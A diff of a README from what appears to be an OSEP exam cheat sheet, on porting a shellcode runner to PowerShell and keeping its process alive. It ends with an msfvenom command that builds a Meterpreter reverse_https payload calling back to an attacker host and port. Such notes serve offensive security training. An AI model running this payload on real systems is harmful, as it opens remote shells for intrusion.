peterkhe1999/CheatSheet/OSEP/README.md

 ## Porting Shellcode Runner to PowerShell

-Use the .NET **Copy** method from the `System.Runtime.InteropServices.Marshal` namespace to copy data from a managed array to an unmanaged memory pointer.
+Use the .NET `Copy` method from the `System.Runtime.InteropServices.Marshal` namespace to copy data from a managed array to an unmanaged memory pointer.

 Previous VBA shellcode runner continued executing because we never terminated its parent process (Word).

-In this version, our shell dies as soon as the parent PowerShell process terminates.
+This time, our shell dies as soon as the parent `PowerShell` process terminates.

 => Instruct PowerShell to delay termination until our shell fully executes using the Win32 **WaitSingleObject** API

+`x64` Meterpreter Handler

 ```bash
 msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f ps1